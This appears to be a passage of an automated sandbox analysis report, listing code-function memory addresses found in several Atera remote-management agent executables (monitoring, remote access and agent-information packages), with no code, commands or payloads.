Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B609722	27_2_00007FFD9B609722
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B616548	27_2_00007FFD9B616548
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B6204F0	27_2_00007FFD9B6204F0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B61D440	27_2_00007FFD9B61D440
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B603BF3	27_2_00007FFD9B603BF3
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B600730	27_2_00007FFD9B600730
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B6016FA	27_2_00007FFD9B6016FA
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B615CDD	27_2_00007FFD9B615CDD
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B6273C8	33_2_00007FFD9B6273C8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B623B65	33_2_00007FFD9B623B65
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B6117A0	33_2_00007FFD9B6117A0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B6166D8	33_2_00007FFD9B6166D8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B62174D	33_2_00007FFD9B62174D
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B6284C0	33_2_00007FFD9B6284C0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B632CC0	33_2_00007FFD9B632CC0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B613525	33_2_00007FFD9B613525
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B631C26	33_2_00007FFD9B631C26
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B625288	33_2_00007FFD9B625288
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B6347AB	33_2_00007FFD9B6347AB
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B613008	33_2_00007FFD9B613008
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B6137ED	33_2_00007FFD9B6137ED
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B611EDF	33_2_00007FFD9B611EDF
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B611DBA	33_2_00007FFD9B611DBA
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B626D91	33_2_00007FFD9B626D91
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B611CCD	33_2_00007FFD9B611CCD
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F0B880	36_2_00007FFDF0F0B880
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FC01E0	36_2_00007FFDF0FC01E0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FB20E0	36_2_00007FFDF0FB20E0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FB6960	36_2_00007FFDF0FB6960
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F19170	36_2_00007FFDF0F19170
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F93200	36_2_00007FFDF0F93200
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EFF220	36_2_00007FFDF0EFF220
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FB50F0	36_2_00007FFDF0FB50F0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E811B0	36_2_00007FFDF0E811B0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EEF1B0	36_2_00007FFDF0EEF1B0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F1B370	36_2_00007FFDF0F1B370
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E8F340	36_2_00007FFDF0E8F340
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F5F3E0	36_2_00007FFDF0F5F3E0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E8D284	36_2_00007FFDF0E8D284
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EA93D0	36_2_00007FFDF0EA93D0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F1D350	36_2_00007FFDF0F1D350
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E8955C	36_2_00007FFDF0E8955C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E874B0	36_2_00007FFDF0E874B0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E83474	36_2_00007FFDF0E83474
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EEB647	36_2_00007FFDF0EEB647
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E95640	36_2_00007FFDF0E95640
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E8D634	36_2_00007FFDF0E8D634
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0ECF630	36_2_00007FFDF0ECF630
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FCF790	36_2_00007FFDF0FCF790
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EF36E0	36_2_00007FFDF0EF36E0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FD1840	36_2_00007FFDF0FD1840
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E9D830	36_2_00007FFDF0E9D830
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F21690	36_2_00007FFDF0F21690
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F756D0	36_2_00007FFDF0F756D0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F27720	36_2_00007FFDF0F27720
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EDF780	36_2_00007FFDF0EDF780
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0ECD770	36_2_00007FFDF0ECD770
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EAD910	36_2_00007FFDF0EAD910
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EE18DA	36_2_00007FFDF0EE18DA
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EEB9F0	36_2_00007FFDF0EEB9F0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F6DB80	36_2_00007FFDF0F6DB80
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EE7B30	36_2_00007FFDF0EE7B30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EB5AD0	36_2_00007FFDF0EB5AD0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FC3C20	36_2_00007FFDF0FC3C20
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EB9A60	36_2_00007FFDF0EB9A60
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F37A60	36_2_00007FFDF0F37A60
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EABBE0	36_2_00007FFDF0EABBE0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F23AF0	36_2_00007FFDF0F23AF0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EC9BA0	36_2_00007FFDF0EC9BA0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EC9CF0	36_2_00007FFDF0EC9CF0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E95E50	36_2_00007FFDF0E95E50
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EB3E10	36_2_00007FFDF0EB3E10
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F5DCC0	36_2_00007FFDF0F5DCC0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F6BCD0	36_2_00007FFDF0F6BCD0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F57D20	36_2_00007FFDF0F57D20
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EB9F30	36_2_00007FFDF0EB9F30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E97F30	36_2_00007FFDF0E97F30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EDFEF0	36_2_00007FFDF0EDFEF0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E87EC0	36_2_00007FFDF0E87EC0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F03EB0	36_2_00007FFDF0F03EB0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EC7E70	36_2_00007FFDF0EC7E70
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F35EA0	36_2_00007FFDF0F35EA0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F27EA0	36_2_00007FFDF0F27EA0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F1FED0	36_2_00007FFDF0F1FED0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F15F20	36_2_00007FFDF0F15F20
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F3C220	36_2_00007FFDF0F3C220
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EF2240	36_2_00007FFDF0EF2240
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F240A0	36_2_00007FFDF0F240A0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F1A0C0	36_2_00007FFDF0F1A0C0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F0C110	36_2_00007FFDF0F0C110
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EA0330	36_2_00007FFDF0EA0330
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EA2310	36_2_00007FFDF0EA2310
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F222B0	36_2_00007FFDF0F222B0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F2A2F0	36_2_00007FFDF0F2A2F0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F48310	36_2_00007FFDF0F48310
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F04550	36_2_00007FFDF0F04550
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F3E590	36_2_00007FFDF0F3E590
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F66590	36_2_00007FFDF0F66590
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E8A524	36_2_00007FFDF0E8A524
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0ED0510	36_2_00007FFDF0ED0510
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FBE5B0	36_2_00007FFDF0FBE5B0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F3A5D0	36_2_00007FFDF0F3A5D0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FA05D0	36_2_00007FFDF0FA05D0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E944DC	36_2_00007FFDF0E944DC
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EE64A0	36_2_00007FFDF0EE64A0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F00600	36_2_00007FFDF0F00600
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E885D4	36_2_00007FFDF0E885D4
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E92738	36_2_00007FFDF0E92738
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E9E720	36_2_00007FFDF0E9E720
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F1A7E0	36_2_00007FFDF0F1A7E0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FBC680	36_2_00007FFDF0FBC680
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E8E80C	36_2_00007FFDF0E8E80C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E828C0	36_2_00007FFDF0E828C0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0ED88A0	36_2_00007FFDF0ED88A0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E98860	36_2_00007FFDF0E98860
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F46860	36_2_00007FFDF0F46860
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E88A3C	36_2_00007FFDF0E88A3C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F76910	36_2_00007FFDF0F76910
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EDE990	36_2_00007FFDF0EDE990
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EFCB50	36_2_00007FFDF0EFCB50
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F2CC00	36_2_00007FFDF0F2CC00
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EA6A80	36_2_00007FFDF0EA6A80
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EC8A60	36_2_00007FFDF0EC8A60
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F4AA70	36_2_00007FFDF0F4AA70
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F6AB00	36_2_00007FFDF0F6AB00
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0ED8B90	36_2_00007FFDF0ED8B90
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FBCD60	36_2_00007FFDF0FBCD60
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F06D20	36_2_00007FFDF0F06D20
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EF4D00	36_2_00007FFDF0EF4D00
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0ECACD0	36_2_00007FFDF0ECACD0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E96CC0	36_2_00007FFDF0E96CC0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FB4C80	36_2_00007FFDF0FB4C80
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EE0E30	36_2_00007FFDF0EE0E30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E84DB4	36_2_00007FFDF0E84DB4
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F48D20	36_2_00007FFDF0F48D20
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0FD0D30	36_2_00007FFDF0FD0D30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0F1EFD0	36_2_00007FFDF0F1EFD0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E8CEA8	36_2_00007FFDF0E8CEA8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EACE70	36_2_00007FFDF0EACE70
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0EC9020	36_2_00007FFDF0EC9020
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0ECAFB0	36_2_00007FFDF0ECAFB0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E92F8C	36_2_00007FFDF0E92F8C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B636011	36_2_00007FFD9B636011
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B63D126	36_2_00007FFD9B63D126
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B8532A6	36_2_00007FFD9B8532A6
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B852BCF	36_2_00007FFD9B852BCF
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B85ADD8	36_2_00007FFD9B85ADD8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B8524E8	36_2_00007FFD9B8524E8
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B9612CF	36_2_00007FFD9B9612CF
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B964D17	36_2_00007FFD9B964D17
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B963C71	36_2_00007FFD9B963C71
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B9612FC	36_2_00007FFD9B9612FC
